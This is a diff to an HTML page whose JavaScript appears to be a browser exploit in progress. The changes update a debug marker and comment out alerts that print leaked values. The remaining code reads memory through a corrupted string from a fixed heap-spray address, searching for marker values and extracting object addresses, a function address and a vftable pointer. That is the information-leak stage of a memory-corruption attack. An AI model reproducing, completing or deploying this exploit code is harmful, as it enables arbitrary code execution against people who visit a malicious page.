--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start5");
+alert("start6");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -132,20 +132,20 @@ while(s1.charCodeAt(a)!=0xAA00){
  a+=1;
 }
 var spray_index=s1.charCodeAt(a-1);
-alert(spray_index.toString(16));
+//alert(spray_index.toString(16));
  var typedarray_index=s1.charCodeAt(a+1);
- alert(typedarray_index.toString(16));
+ //alert(typedarray_index.toString(16));
 a=0x50010000/2;
 while(s1.charCodeAt(a)!=0x6666){
  a+=1;
 }
 var arr_addr=(s1.charCodeAt(a-3)<<16)+s1.charCodeAt(a-4)
 var func_addr=(s1.charCodeAt(a+5)<<16)+s1.charCodeAt(a+4);
-alert(arr_addr.toString(16));
-alert(func_addr.toString(16));
+//alert(arr_addr.toString(16));
+//alert(func_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-alert(vftable.toString(16));
+//alert(vftable.toString(16));
 a=(func_addr+0x30)/2;
 var p_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 a=(p_addr+0x10)/2;
